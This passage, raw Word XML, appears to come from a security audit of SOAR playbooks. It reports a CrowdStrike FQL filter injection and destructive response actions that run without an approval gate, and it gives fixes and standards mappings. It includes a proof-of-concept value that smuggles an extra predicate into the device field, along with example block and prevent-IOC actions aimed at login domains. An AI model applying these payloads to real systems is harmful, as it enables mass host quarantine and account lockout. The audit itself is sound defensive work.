        <w:t>for k, v in host_search.items():</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arr = ",".join(ps_quote(fp) for fp in v)</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script_str = f"$ProgressPreference='SilentlyContinue'; Test-Path @({arr}) | ConvertTo-Json"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Single-quoted PowerShell strings are literal (no subexpression evaluation), and doubling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> neutralises quote breakout; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Remove-Item -LiteralPath @(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the delete branch. Behaviour is unchanged for normal paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-78 OS Command Injection (2024 CWE Top 25 #7); CWE-88 Improper Neutralization of Argument Delimiters in a Command (Argument Injection). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059.001 Command and Scripting Interpreter: PowerShell, T1105 Ingress Tool Transfer. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-01 — CrowdStrike FQL filter injection via playbook_input:device (10 playbooks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.2). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/CrowdStrike_OAuth_API_Network_Isolation.py:145; playbooks/CrowdStrike_OAuth_API_Network_Restore.py:145; playbooks/CrowdStrike_OAuth_API_File_Eviction.py:128; playbooks/CrowdStrike_OAuth_API_File_Collection.py:135; playbooks/CrowdStrike_OAuth_API_File_Restore.py:118; playbooks/CrowdStrike_OAuth_API_Process_Termination.py:127; playbooks/CrowdStrike_OAuth_API_Executable_Denylisting.py:121; playbooks/CrowdStrike_OAuth_API_Endpoint_Analysis.py:52; playbooks/CrowdStrike_OAuth_API_Get_Device_Info.py:29; playbooks/CrowdStrike_OAuth_API_Device_Attribute_Lookup.py:158,258</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CrowdStrike_OAuth_API_Network_Isolation.py:145</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Network_Restore.py:145</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>File_Eviction.py:128</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>File_Collection.py:135</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>File_Restore.py:118</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Process_Termination.py:127</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Executable_Denylisting.py:121</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Endpoint_Analysis.py:52</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Get_Device_Info.py:29</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Device_Attribute_Lookup.py:158,258</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (variant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hostname:"{0}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>local_ip:"{0}",external_ip:"{0}"</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># Network_Isolation.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>145  template = """%%\nhostname:['{0}'],device_id:['{0}']\n%%"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>148  parameters = ["playbook_input:device"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>162  phantom.format(container=container, template=template, parameters=parameters, name="format_fql")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...  # query_device uses the string as "filter", limit 50, then iterates every returned device_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The device selector is turned into an FQL filter by raw string substitution. FQL uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the string delimiter, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for value lists and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as OR. Nothing is quoted/validated, and the template reads the *unfiltered* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_input:device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A crafted value closes the list and ORs in another predicate, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>query device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (limit 50) returns up to 50 unrelated hosts; downstream blocks then act on every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>device_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returned - quarantine, RTR kill/rm/get, or indicator upload. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comes from a notable/artifact CEF field (hostname), which an attacker chooses by generating the alert. Source -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>query device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filter -&gt; loop over results -&gt; response action. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - depends on Falcon accepting the extra predicate and on the connector not re-quoting; the widening to many hosts is the realistic impact even where syntax-breaking is blocked. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scratchpad/work/pb1/poc_fql_rtr.py</w:t>
      </w:r>
      <w:r>
        <w:t>, real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>device = "WS01'],platform_name:['Windows"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>query device filter -&gt; "\nhostname:['WS01'],platform_name:['Windows'],device_id:['WS01'],platform_name:['Windows']\n"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The injected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>platform_name:['Windows']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> predicate is now part of the OR filter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: validate the device string against an allow-list pattern and let the connector quote it. Reject anything that is not a bare hostname or a 32-hex AID before building the filter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def _valid_device(d):</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return bool(re.fullmatch(r'[A-Za-z0-9._-]{1,255}', d or '')) or bool(re.fullmatch(r'[0-9a-fA-F]{32}', d or ''))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>parameters = []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for item in phantom.collect2(container=container, datapath=["filtered-data:input_filter:condition_1:playbook_input:device"]):</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dev = item[0]</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if not _valid_device(dev):</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phantom.error(f"Rejected device selector: {dev!r}")</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continue</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 quote each value; never let the raw value carry ' ] ,</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parameters.append({"limit": 50, "filter": f'hostname:[\'{dev}\'],device_id:[\'{dev}\']'})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The allow-list stops the metacharacters FQL relies on (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>' [ ] ,</w:t>
      </w:r>
      <w:r>
        <w:t>), so the value can only ever land inside one quoted list element; functionality is unchanged for legitimate hostnames/AIDs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools, T1489 Service Stop. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-3 Access Enforcement, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-03 — Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: High (CVSS v3.1 base 8.1). Exploitability: Exploitable for denial/lockout (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/AD_LDAP_Account_Locking.py:44-76; AWS_IAM_Account_*.py; Azure_AD_Account_*.py; CrowdStrike_OAuth_API_Network_Isolation.py:44-76; playbooks/CrowdStrike_OAuth_API_Executable_Denylisting.py:218-254; Cisco_Umbrella_DNS_Denylisting.py:44-75; Panorama_Outbound_Traffic_Filtering.py:106-139; Active_Directory_*_Dispatch.py:20-45; DNS_Denylisting_Dispatch.py:94-121</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Each of these playbooks moves from input straight to a state-changing action (disable/enable account, quarantine host, kill process, delete file, block domain/URL, upload a fleet-wide prevent IOC) with only an "is the field non-empty" filter in between. There is no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.prompt</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and no allow/deny list of protected assets. Because the selector is attacker-influenced (PB1-01/PB1-11), an adversary who can shape a notable can aim a destructive action at a chosen target: disable the SOC's own admin account, block a legitimate domain/URL (SSO, VPN, update server), quarantine a critical server, or push a global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prevent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IOC on a hash collision/legitimate binary. This is a weaponizable self-DoS / lockout. The two Microsoft/Gmail *Search and Purge* automation playbooks are the positive counter-example - they do gate on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before deletion. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: notable/artifact field -&gt; filter (non-empty) -&gt; action. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable for denial/lockout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (integrity/availability), conditioned on which assets the automation user can touch and on the playbook being wired to auto-run (dispatch playbooks are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_type: Automation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_dispatch.py</w:t>
      </w:r>
      <w:r>
        <w:t>, real output) - no prompt block executes before the action:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>block domain -&gt; {"domain": "login.microsoftonline.com"}        (Cisco Umbrella)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>block url    -&gt; {"url": "https://sso.example.com/login", "device_group": "shared", "should_commit_changes": true}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>upload indicator -&gt; {"ioc": "&lt;hash&gt;", "action": "prevent", "platforms": "linux,mac,windows", ...}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
